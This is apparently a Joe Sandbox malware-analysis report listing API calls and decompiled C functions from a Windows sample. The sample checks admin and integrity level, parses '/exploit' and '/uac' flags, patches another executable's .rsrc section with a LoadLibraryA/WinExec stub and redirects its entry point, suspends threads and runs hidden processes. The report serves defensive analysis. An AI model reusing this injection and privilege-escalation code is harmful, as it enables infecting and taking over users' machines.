Part of subcall function 00D329C6: GetLastError.KERNEL32(?,?), ref: 00D329FA
Part of subcall function 00D329C6: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00D32A24
Part of subcall function 00D329C6: OpenProcessToken.ADVAPI32(00000000,?,?), ref: 00D32A2B
Part of subcall function 00D329C6: GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00D32A51
Part of subcall function 00D329C6: GetLastError.KERNEL32(?,?), ref: 00D32A57
Part of subcall function 00D329C6: CloseHandle.KERNEL32(?), ref: 00D32A60
Part of subcall function 00D329C6: GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00D32A86
Part of subcall function 00D329C6: CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?,?,?), ref: 00D32A9E
Part of subcall function 00D329C6: CheckTokenMembership.ADVAPI32(?,?,?,?,?), ref: 00D32AB6
Part of subcall function 00D329C6: GetLastError.KERNEL32(?,?), ref: 00D32AC5
Part of subcall function 00D329C6: CloseHandle.KERNEL32(?), ref: 00D32ACE
Part of subcall function 00D329C6: IsUserAnAdmin.SHELL32 ref: 00D32AD2
Part of subcall function 00D329C6: CloseHandle.KERNEL32(?), ref: 00D32ADD
Part of subcall function 00D329C6: GetLastError.KERNEL32(?,?), ref: 00D32AE1
Part of subcall function 00D329C6: IsUserAnAdmin.SHELL32 ref: 00D32AEB

_memset.LIBCMT ref: 00D31CFC
GetVersionExA.KERNEL32(?,?,?), ref: 00D31D11
GetVersionExA.KERNEL32(?,?,?), ref: 00D31D22
GetCurrentProcess.KERNEL32(?,?,?), ref: 00D31D39

Part of subcall function 00D3289C: _memset.LIBCMT ref: 00D328CA
Part of subcall function 00D3289C: GetVersionExA.KERNEL32(?,00000000,7622DF30,00000000), ref: 00D328DF
Part of subcall function 00D3289C: GetVersionExA.KERNEL32(?), ref: 00D328F0
Part of subcall function 00D3289C: OpenProcessToken.ADVAPI32(?,00000018,?), ref: 00D3290D
Part of subcall function 00D3289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00D3292F
Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3293B
Part of subcall function 00D3289C: LocalAlloc.KERNEL32(00000040,?), ref: 00D32947
Part of subcall function 00D3289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00D32960
Part of subcall function 00D3289C: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00D32968
Part of subcall function 00D3289C: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00D32978
Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3298B
Part of subcall function 00D3289C: LocalFree.KERNEL32(00000000), ref: 00D32992
Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3299A
Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3299E
Part of subcall function 00D3289C: CloseHandle.KERNEL32(?), ref: 00D329A7
Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D329AF

GetCommandLineA.KERNEL32(?,?), ref: 00D31D4D
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D31D76

Part of subcall function 00D32308: GetTickCount.KERNEL32 ref: 00D32313
Part of subcall function 00D32308: _memset.LIBCMT ref: 00D32344
Part of subcall function 00D32308: GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00D32359
Part of subcall function 00D32308: GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00D3236A
Part of subcall function 00D32308: GetCommandLineW.KERNEL32(?,00000000,?,7622DAA3,00000000), ref: 00D32392
Part of subcall function 00D32308: CommandLineToArgvW.SHELL32(00000000), ref: 00D32399
Part of subcall function 00D32308: LocalFree.KERNEL32(00000000,00000000,?,7622DAA3,00000000), ref: 00D32432

IsUserAnAdmin.SHELL32 ref: 00D31D98
GetModuleHandleA.KERNEL32(00000000,?,00000103,?,?), ref: 00D31DB3
GetModuleFileNameA.KERNEL32(00000000,?,?), ref: 00D31DB6

Part of subcall function 00D3250C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D32526
Part of subcall function 00D3250C: GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00D31DD6,?,?,?,?,?), ref: 00D32536
Part of subcall function 00D3250C: LocalAlloc.KERNEL32(00000040,00000000,?,?,00D31DD6,?,?,?,?,?), ref: 00D32544
Part of subcall function 00D3250C: ReadFile.KERNEL32(00000000,00000000,00D31DD6,?,00000000), ref: 00D3255F
Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D32572
Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3257A
Part of subcall function 00D3250C: CloseHandle.KERNEL32(00000000), ref: 00D32583
Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3258C

Part of subcall function 00D32BDC: GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,00000000,7622DAA3), ref: 00D32BFB
Part of subcall function 00D32BDC: GetProcAddress.KERNEL32(00000000), ref: 00D32C02
Part of subcall function 00D32BDC: GetCurrentProcess.KERNEL32(?), ref: 00D32C12
Part of subcall function 00D32BDC: GetVersionExA.KERNEL32(?), ref: 00D32C30
Part of subcall function 00D32BDC: GetTempPathA.KERNEL32(00000104,?), ref: 00D32C73
Part of subcall function 00D32BDC: GetTickCount.KERNEL32 ref: 00D32C75
Part of subcall function 00D32BDC: _strlen.LIBCMT ref: 00D32C88
Part of subcall function 00D32BDC: wsprintfA.USER32 ref: 00D32C96
Part of subcall function 00D32BDC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00D32CC2
Part of subcall function 00D32BDC: GetTempPathA.KERNEL32(00000104,?), ref: 00D32CE4
Part of subcall function 00D32BDC: GetTempPathA.KERNEL32(00000104,?), ref: 00D32D5E
Part of subcall function 00D32BDC: DeleteFileA.KERNEL32(?), ref: 00D32D7A
Part of subcall function 00D32BDC: GetWindowsDirectoryA.KERNEL32(?,00000103,?), ref: 00D32DBE
Part of subcall function 00D32BDC: GetWindowsDirectoryA.KERNEL32(?,00000103), ref: 00D32DDB
Part of subcall function 00D32BDC: DeleteFileA.KERNEL32(?,?,?,?), ref: 00D32E4B
Part of subcall function 00D32BDC: DeleteFileA.KERNEL32(?,?), ref: 00D32E54
Part of subcall function 00D32BDC: LocalFree.KERNEL32(?,?,?,?,?,?,?,?), ref: 00D32E59
Part of subcall function 00D32BDC: DeleteFileA.KERNEL32(?,?,?,?), ref: 00D32E66
Part of subcall function 00D32BDC: DeleteFileA.KERNEL32(?), ref: 00D32E6F
Part of subcall function 00D32BDC: GetLastError.KERNEL32 ref: 00D32E77

Part of subcall function 00D33143: GetModuleHandleA.KERNEL32(00000000,00000000,7622DAA3,00000000), ref: 00D3315B
Part of subcall function 00D33143: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00D33173
Part of subcall function 00D33143: GetTempPathA.KERNEL32(00000104,?), ref: 00D331A5
Part of subcall function 00D33143: GetTempPathA.KERNEL32(00000104,?), ref: 00D331CD
Part of subcall function 00D33143: GetTickCount.KERNEL32 ref: 00D331CF
Part of subcall function 00D33143: _strlen.LIBCMT ref: 00D331E2
Part of subcall function 00D33143: wsprintfA.USER32 ref: 00D331F0
Part of subcall function 00D33143: GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00D33207
Part of subcall function 00D33143: GetProcAddress.KERNEL32(00000000), ref: 00D3320A
Part of subcall function 00D33143: GetCurrentProcess.KERNEL32(00000000), ref: 00D3321A
Part of subcall function 00D33143: GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00D33251
Part of subcall function 00D33143: GetTempPathA.KERNEL32(00000104,?), ref: 00D3330F
Part of subcall function 00D33143: GetTickCount.KERNEL32 ref: 00D33311
Part of subcall function 00D33143: _strlen.LIBCMT ref: 00D33324
Part of subcall function 00D33143: wsprintfA.USER32 ref: 00D33332
Part of subcall function 00D33143: MoveFileA.KERNEL32(?,?), ref: 00D33349
Part of subcall function 00D33143: LocalFree.KERNEL32(?,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D33384
Part of subcall function 00D33143: GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00D333D2
Part of subcall function 00D33143: RegisterWindowMessageA.USER32(?,?), ref: 00D3341D
Part of subcall function 00D33143: LockWorkStation.USER32 ref: 00D3343D
Part of subcall function 00D33143: CreateEventA.KERNEL32(00000000,00000000,00000000,Global\AtomFun,00000055), ref: 00D33456
Part of subcall function 00D33143: GetLastError.KERNEL32 ref: 00D33463
Part of subcall function 00D33143: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00D33471
Part of subcall function 00D33143: CloseHandle.KERNEL32(00000000), ref: 00D33485
Part of subcall function 00D33143: GetTempPathA.KERNEL32(00000104,?), ref: 00D33493
Part of subcall function 00D33143: GetTickCount.KERNEL32 ref: 00D33495
Part of subcall function 00D33143: _strlen.LIBCMT ref: 00D334A8
Part of subcall function 00D33143: wsprintfA.USER32 ref: 00D334B6
Part of subcall function 00D33143: MoveFileA.KERNEL32(?,?), ref: 00D334CD
Part of subcall function 00D33143: CopyFileA.KERNEL32(?,?,00000000), ref: 00D334DF

Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?), ref: 00D31E6D
LocalFree.KERNEL32(?,?,?), ref: 00D31E76

Part of subcall function 00D322DC: GetLastError.KERNEL32(00000000,7622DAA3,00D3232C,00000000), ref: 00D322EB
Part of subcall function 00D322DC: CloseHandle.KERNEL32(00000000), ref: 00D322FD

Part of subcall function 00D31434: IsUserAnAdmin.SHELL32 ref: 00D31435
Part of subcall function 00D31434: GetLastError.KERNEL32(?,?), ref: 00D31446
Part of subcall function 00D31434: CloseHandle.KERNEL32(00000000), ref: 00D3145E

Part of subcall function 00D32481: ExitProcess.KERNEL32 ref: 00D324A3

Strings

"%s" /uac, xrefs: 00D31E19
"%s" /exploit, xrefs: 00D31E48

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: ErrorLast$Handle$File$CloseVersion$LocalPathProcessTempToken$CountModule$DeleteFreeTick$AdminCurrentDirectoryInformationUser_memset_strlenwsprintf$CommandCreateLineName$AddressAllocAuthorityClipboardFormatMoveOpenProcSystemWindows$ArgvCheckCopyEventExitKnownLockMembershipMessageObjectReadRegisterSingleSizeSleepStationWaitWellWindowWork
String ID: "%s" /exploit$"%s" /uac
API String ID: 1631179323-107240129
Opcode ID: 628e5d43e16525fd4b099a876a1c387259a396dc70d42449417a1e8ae18bd366
Instruction ID: b29561f7684d5188d584a479a3702ac167fdecf6321cff030abdf477b973bcbe
Opcode Fuzzy Hash: 628e5d43e16525fd4b099a876a1c387259a396dc70d42449417a1e8ae18bd366
Instruction Fuzzy Hash: 2B41F37A90025A9BDF21EFA1DD45AEE7BACEF44340F040526FD18E2121EB759A45CF70

Uniqueness

Uniqueness Score: -1.00%

Function 00D32308, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 126
COMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00D32308(void* __eflags) {
				void* _t29;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t36;
				signed int _t38;
				void* _t40;
				void* _t41;
				void* _t42;
				void* _t43;
				int _t45;
				void* _t47;
				void _t49;
				void _t50;
				void _t51;
				void _t52;
				signed int _t63;
				void* _t70;
				void* _t72;
				void* _t76;

				_t76 = __eflags;
				_t70 = _t72 - 0x64;
				E00D32001(GetTickCount());
				 *0xd35a00 =  *((intOrPtr*)(_t70 + 0x6c));
				if(E00D322DC(_t76) == 0) {
					E00D33510(_t70 - 0x3c, 0, 0x9c);
					 *(_t70 - 0x3c) = 0x9c;
					_t29 = GetVersionExA(_t70 - 0x3c);
					__eflags = _t29;
					if(_t29 != 0) {
						L4:
						__eflags =  *((intOrPtr*)(_t70 - 0x38)) - 5;
						if( *((intOrPtr*)(_t70 - 0x38)) != 5) {
							L6:
							__eflags =  *((intOrPtr*)(_t70 - 0x38)) - 6;
							if( *((intOrPtr*)(_t70 - 0x38)) >= 6) {
								L8:
								 *(_t70 + 0x60) =  *(_t70 + 0x60) & 0x00000000;
								_t47 = CommandLineToArgvW(GetCommandLineW(), _t70 + 0x60);
								__eflags = _t47;
								if(_t47 == 0) {
									L20:
									_t33 =  *(_t70 + 0x70);
									__eflags = _t33;
									if(_t33 != 0) {
										_t52 =  *0xd35a04; // 0x0
										 *_t33 = _t52;
									}
									_t34 =  *(_t70 + 0x74);
									__eflags = _t34;
									if(_t34 != 0) {
										_t51 =  *0xd35a08; // 0x0
										 *_t34 = _t51;
									}
									_t35 =  *(_t70 + 0x78);
									__eflags = _t35;
									if(_t35 != 0) {
										_t50 =  *0xd35a0c; // 0x0
										 *_t35 = _t50;
									}
									_t36 =  *(_t70 + 0x7c);
									__eflags = _t36;
									if(_t36 != 0) {
										_t49 =  *0xd35a10; // 0x0
										 *_t36 = _t49;
									}
									_t38 = 1;
									__eflags = 1;
									L29:
									goto L30;
								}
								_t63 = 1;
								__eflags =  *(_t70 + 0x60) - 1;
								if( *(_t70 + 0x60) <= 1) {
									L19:
									LocalFree(_t47);
									goto L20;
								} else {
									goto L10;
								}
								do {
									L10:
									_t69 = _t47 + _t63 * 4;
									_t40 = E00D33A11( *(_t47 + _t63 * 4), L"/runmain");
									__eflags = _t40;
									if(_t40 != 0) {
										_t41 = E00D33A11( *_t69, L"/exploit");
										__eflags = _t41;
										if(_t41 != 0) {
											_t42 = E00D33A11( *_t69, L"/uac");
											__eflags = _t42;
											if(_t42 != 0) {
												_t43 = E00D33A11( *_t69, L"/executable");
												__eflags = _t43;
												if(_t43 == 0) {
													 *0xd35a10 = 1;
												}
											} else {
												 *0xd35a0c = 1;
											}
										} else {
											 *0xd35a08 = 1;
										}
									} else {
										 *0xd35a04 = 1;
									}
									_t63 = _t63 + 1;
									__eflags = _t63 -  *(_t70 + 0x60);
								} while (_t63 <  *(_t70 + 0x60));
								goto L19;
							}
							L7:
							_t38 = 0;
							goto L29;
						}
						__eflags =  *((intOrPtr*)(_t70 - 0x34)) - 1;
						if( *((intOrPtr*)(_t70 - 0x34)) >= 1) {
							goto L8;
						}
						goto L6;
					}
					 *(_t70 - 0x3c) = 0x94;
					_t45 = GetVersionExA(_t70 - 0x3c);
					__eflags = _t45;
					if(_t45 == 0) {
						goto L7;
					}
					goto L4;
				} else {
					_t38 = 0;
					L30:
					return _t38;
				}
			}

0x00d32308
0x00d32309
0x00d3231a
0x00d32322
0x00d3232e
0x00d32344
0x00d3234f
0x00d32359
0x00d3235b
0x00d3235d
0x00d32370
0x00d32370
0x00d32374
0x00d3237c
0x00d3237c
0x00d32380
0x00d32389
0x00d32389
0x00d3239f
0x00d323a1
0x00d323a3
0x00d32439
0x00d32439
0x00d3243d
0x00d3243f
0x00d32441
0x00d32447
0x00d32447
0x00d32449
0x00d3244c
0x00d3244e
0x00d32450
0x00d32456
0x00d32456
0x00d32458
0x00d3245b
0x00d3245d
0x00d3245f
0x00d32465
0x00d32465
0x00d32467
0x00d3246a
0x00d3246c
0x00d3246e
0x00d32474
0x00d32474
0x00d32478
0x00d32478
0x00d32479
0x00000000
0x00d32479
0x00d323ac
0x00d323ad
0x00d323b0
0x00d32431
0x00d32432
0x00000000
0x00000000
0x00000000
0x00000000
0x00d323b2
0x00d323b2
0x00d323b2
0x00d323bc
0x00d323c3
0x00d323c5
0x00d323da
0x00d323e1
0x00d323e3
0x00d323f8
0x00d323ff
0x00d32401
0x00d32416
0x00d3241d
0x00d3241f
0x00d32421
0x00d32421
0x00d32403
0x00d32403
0x00d32403
0x00d323e5
0x00d323e5
0x00d323e5
0x00d323c7
0x00d323c7
0x00d323c7
0x00d3242b
0x00d3242c
0x00d3242c
0x00000000
0x00d323b2
0x00d32382
0x00d32382
0x00000000
0x00d32382
0x00d32376
0x00d3237a
0x00000000
0x00000000
0x00000000
0x00d3237a
0x00d32363
0x00d3236a
0x00d3236c
0x00d3236e
0x00000000
0x00000000
0x00000000
0x00d32330
0x00d32330
0x00d3247a
0x00d3247e
0x00d3247e

APIs

GetTickCount.KERNEL32 ref: 00D32313

Part of subcall function 00D322DC: GetLastError.KERNEL32(00000000,7622DAA3,00D3232C,00000000), ref: 00D322EB
Part of subcall function 00D322DC: CloseHandle.KERNEL32(00000000), ref: 00D322FD

_memset.LIBCMT ref: 00D32344
GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00D32359
GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00D3236A
GetCommandLineW.KERNEL32(?,00000000,?,7622DAA3,00000000), ref: 00D32392
CommandLineToArgvW.SHELL32(00000000), ref: 00D32399
LocalFree.KERNEL32(00000000,00000000,?,7622DAA3,00000000), ref: 00D32432

Strings

/exploit, xrefs: 00D323D3
/executable, xrefs: 00D3240F
/runmain, xrefs: 00D323B5
/uac, xrefs: 00D323F1

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: CommandLineVersion$ArgvCloseCountErrorFreeHandleLastLocalTick_memset
String ID: /executable$/exploit$/runmain$/uac
API String ID: 2049752164-780269054
Opcode ID: 05ec0481d0d5ea4be8dadb568f5ee84bc3ab8b79aed7fbd722172503574a99b4
Instruction ID: a538e9d14dc62b16bdb185e55f375c1c02aab3721135248199f41f702295b3ab
Opcode Fuzzy Hash: 05ec0481d0d5ea4be8dadb568f5ee84bc3ab8b79aed7fbd722172503574a99b4
Instruction Fuzzy Hash: 75419936E0434ADBDB24DFA9EC81AAA37E8FB14350F140529E851D3260EB74E844DB30

Uniqueness

Uniqueness Score: -1.00%

Function 00D32F02, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 106
libraryloaderfileCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00D32F02(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				void* _t50;
				void* _t66;
				char* _t72;
				void* _t78;
				signed int _t80;
				intOrPtr* _t82;
				void* _t87;

				_v16 = 0xd32f01;
				_t50 = E00D320EC(_a12);
				_v8 = _v8 & 0x00000000;
				_v12 = _t50 + 0xd32f01 - E00D32E88 + 0x111;
				_t87 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_t80 =  *(_t87 + 6) & 0x0000ffff;
				_t78 = ( *(_t87 + 0x14) & 0x0000ffff) + _t87 + 0x18;
				if(_t80 == 0) {
					L11:
					return 1;
				}
				while(E00D3214C(_t78, ".rsrc", 5) != 0) {
					_t78 = _t78 + 0x28;
					_v8 = _v8 + 1;
					if(_v8 < _t80) {
						continue;
					}
					goto L11;
				}
				if( *((intOrPtr*)(_t78 + 0x10)) >= _v12) {
					_t82 =  *((intOrPtr*)(_t78 + 0x14)) + _a4;
					E00D320CE(_t82, 0, 0x110);
					 *((intOrPtr*)(_t82 + 8)) =  *((intOrPtr*)(_t87 + 0x28));
					 *_t82 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
					 *((intOrPtr*)(_t82 + 4)) = GetProcAddress(GetModuleHandleA("kernel32.dll"), "WinExec");
					if(_a16 != 0) {
						E00D32194(_t82 + 0xc, _a16);
					}
					E00D32194(_t82 + 0x110, _a12);
					_t66 = E00D320EC(_a12);
					_t32 = _t82 + 0x111; // 0x111
					E00D320AE(_t66 + _t32, E00D32E88, _v16);
					 *((intOrPtr*)(_t87 + 0x28)) = E00D320EC(_a12) +  *((intOrPtr*)(_t78 + 0xc)) + 0x111;
					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x20000000;
					 *((intOrPtr*)(_t87 + 0x88)) = 0;
					 *((intOrPtr*)(_t87 + 0x8c)) = 0;
					_v12 = 0;
					_v8 = 0;
					_t72 =  &_v12;
					__imp__CheckSumMappedFile(_a4, _a8, _t72,  &_v8);
					if(_t72 == 0) {
						GetLastError();
					} else {
						 *(_t87 + 0x58) = _v8;
					}
					goto L11;
				}
				return 0;
			}

0x00d32f19
0x00d32f1c
0x00d32f21
0x00d32f2c
0x00d32f35
0x00d32f37
0x00d32f3f
0x00d32f45
0x00d3305b
0x00000000
0x00d3305d
0x00d32f4b
0x00d32f5c
0x00d32f5f
0x00d32f65
0x00000000
0x00000000
0x00000000
0x00d32f67
0x00d32f72
0x00d32f7e
0x00d32f89
0x00d32f9b
0x00d32fb5
0x00d32fc8
0x00d32fcb
0x00d32fd4
0x00d32fd4
0x00d32fe3
0x00d32feb
0x00d32ff3
0x00d33000
0x00d33017
0x00d3301a
0x00d33023
0x00d33029
0x00d3302f
0x00d33032
0x00d33039
0x00d33043
0x00d3304b
0x00d33055
0x00d3304d
0x00d33050
0x00d33050
0x00000000
0x00d3304b
0x00000000

APIs

Part of subcall function 00D320CE: _memset.LIBCMT ref: 00D320E1

GetModuleHandleA.KERNEL32(kernel32.dll,LoadLibraryA,?,00000000,00000110,?,.rsrc,00000005,76248354,0000C002,00000104,76248354,?,?), ref: 00D32F9E
GetProcAddress.KERNEL32(00000000), ref: 00D32FA5
GetModuleHandleA.KERNEL32(kernel32.dll,WinExec), ref: 00D32FB7
GetProcAddress.KERNEL32(00000000), ref: 00D32FBE
CheckSumMappedFile.IMAGEHLP(?,?,?,00000000,?,00000111,00D32E88,?,?,?,?), ref: 00D33043
GetLastError.KERNEL32 ref: 00D33055

Strings

kernel32.dll, xrefs: 00D32F96, 00D32FB0
WinExec, xrefs: 00D32FAB
.rsrc, xrefs: 00D32F4D
LoadLibraryA, xrefs: 00D32F91

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: AddressHandleModuleProc$CheckErrorFileLastMapped_memset
String ID: .rsrc$LoadLibraryA$WinExec$kernel32.dll
API String ID: 600805798-1606967582
Opcode ID: 08a7c4b4ee29f6c8779f4ed9cc2d59d6afeebf209540328be431069bd7d40993
Instruction ID: 6a18c821a77470199e8c3242b158ce6c84d45be96a5a713ab08a68f383492c0a
Opcode Fuzzy Hash: 08a7c4b4ee29f6c8779f4ed9cc2d59d6afeebf209540328be431069bd7d40993
Instruction Fuzzy Hash: 4141477590030AEFCB149FA4C945AEABBB8EF08304F104525F959E7251E771EA58DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D32AF9, Relevance: 16.6, APIs: 11, Instructions: 93
processmemorysynchronizationCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00D32AF9(DWORD* _a4, intOrPtr _a8, char _a12) {
				CHAR* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				intOrPtr* _t23;
				char* _t24;
				void* _t45;
				long _t49;

				_t23 = _a4;
				_v8 = 0;
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				_t24 =  &_a12;
				_push(_t24);
				_push(_a8);
				E00D33E9D();
				_t45 = LocalAlloc(0x40, _t24 + 0x100);
				if(_t45 != 0) {
					_push( &_a12);
					_push(_a8);
					_push(_t45);
					E00D33E92();
					E00D33510( &_v24, 0, 0x10);
					_t49 = 0x44;
					E00D33510( &_v92, 0, _t49);
					_v92.cb = _t49;
					GetStartupInfoA( &_v92);
					_v92.wShowWindow = 0;
					_v92.dwFlags = 1;
					if(CreateProcessA(0, _t45, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24) == 0) {
						GetLastError();
					} else {
						WaitForSingleObject(_v24.hProcess, 0xffffffff);
						if(_a4 != 0) {
							GetExitCodeProcess(_v24.hProcess, _a4);
						}
						CloseHandle(_v24.hThread);
						CloseHandle(_v24);
						_v8 = 1;
					}
					LocalFree(_t45);
					return _v8;
				} else {
					return 0;
				}
			}

0x00d32aff
0x00d32b06
0x00d32b0b
0x00d32b0d
0x00d32b0d
0x00d32b0f
0x00d32b12
0x00d32b13
0x00d32b16
0x00d32b2b
0x00d32b2f
0x00d32b3c
0x00d32b3d
0x00d32b40
0x00d32b41
0x00d32b4d
0x00d32b54
0x00d32b5b
0x00d32b67
0x00d32b6a
0x00d32b72
0x00d32b89
0x00d32b94
0x00d32bc7
0x00d32b96
0x00d32b9b
0x00d32ba4
0x00d32bac
0x00d32bac
0x00d32bbb
0x00d32bc0
0x00d32bc2
0x00d32bc2
0x00d32bce
0x00000000
0x00d32b31
0x00000000
0x00d32b31

APIs

LocalAlloc.KERNEL32(00000040,-00000100,00000104,7622458A), ref: 00D32B25
_memset.LIBCMT ref: 00D32B4D
_memset.LIBCMT ref: 00D32B5B
GetStartupInfoA.KERNEL32(?), ref: 00D32B6A
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00D32D96), ref: 00D32B8C
WaitForSingleObject.KERNEL32(00D32D96,000000FF), ref: 00D32B9B
GetExitCodeProcess.KERNEL32(00D32D96,?), ref: 00D32BAC
CloseHandle.KERNEL32(00000000), ref: 00D32BBB
CloseHandle.KERNEL32(00D32D96), ref: 00D32BC0
GetLastError.KERNEL32(?,?,00000000,?,00000000,76248354), ref: 00D32BC7
LocalFree.KERNEL32(00000000,?,?,00000000,?,00000000,76248354), ref: 00D32BCE

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: CloseHandleLocalProcess_memset$AllocCodeCreateErrorExitFreeInfoLastObjectSingleStartupWait
String ID:
API String ID: 3970834964-0
Opcode ID: c834e75f99b2733470247063f7e6d9736dff0f20690f336dca8ca565fe5bf3f7
Instruction ID: b00dafde57eeffb1db34ee39f1cc474c1f8bc3fcc247eab0aea0d2aa30fa3675
Opcode Fuzzy Hash: c834e75f99b2733470247063f7e6d9736dff0f20690f336dca8ca565fe5bf3f7
Instruction Fuzzy Hash: 26218EB6900259AFCB11AFE4DD89DEFBBBCEF08711F104522F605E6154D6709A80DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D31C33, Relevance: 13.6, APIs: 9, Instructions: 66
threadprocessinjectionCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00D31C33(int _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v24;
				long _v28;
				void _v32;
				void* _v36;
				long _t29;
				void* _t33;
				signed int _t34;
				void* _t42;

				_v8 = _v8 & 0x00000000;
				_t33 = CreateToolhelp32Snapshot(4, _a4);
				if(_t33 == 0xffffffff) {
					GetLastError();
					L15:
					return _v8;
				}
				_t34 = 6;
				memset( &_v32, 0, _t34 << 2);
				_v36 = 0x1c;
				if(Thread32First(_t33,  &_v36) == 0) {
					GetLastError();
					goto L13;
				} else {
					do {
						if(_v24 == _a4) {
							_t29 = _v28;
							if(_a8 == 0 || _t29 == _a8) {
								_t42 = OpenThread(2, 0, _t29);
								if(_t42 != 0) {
									if(SuspendThread(_t42) != 0xffffffff) {
										_v8 = _v8 + 1;
									}
									CloseHandle(_t42);
								}
							}
						}
					} while (Thread32Next(_t33,  &_v36) != 0);
					L13:
					CloseHandle(_t33);
					goto L15;
				}
			}

0x00d31c39
0x00d31c48
0x00d31c4d
0x00d31ccc
0x00d31cd2
0x00d31cd7
0x00d31cd7
0x00d31c52
0x00d31c58
0x00d31c5f
0x00d31c73
0x00d31cc0
0x00000000
0x00d31c75
0x00d31c76
0x00d31c7c
0x00d31c82
0x00d31c85
0x00d31c97
0x00d31c9b
0x00d31ca7
0x00d31ca9
0x00d31ca9
0x00d31cad
0x00d31cad
0x00d31c9b
0x00d31c85
0x00d31cb9
0x00d31cc6
0x00d31cc7
0x00000000
0x00d31cc9

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,?), ref: 00D31C43
Thread32First.KERNEL32(00000000,?), ref: 00D31C66
OpenThread.KERNEL32(00000002,00000000,00D31FAF,7622D965,00000000,00000004,?,00000000), ref: 00D31C91
SuspendThread.KERNEL32(00000000), ref: 00D31C9E
CloseHandle.KERNEL32(00000000), ref: 00D31CAD
Thread32Next.KERNEL32(00000000,0000001C), ref: 00D31CB4
GetLastError.KERNEL32(00000000,00000004,?,00000000), ref: 00D31CC0
CloseHandle.KERNEL32(00000000), ref: 00D31CC7
GetLastError.KERNEL32(00000004,?,00000000,?,?,00D31FAF,00000000,00000000,00000000), ref: 00D31CCC

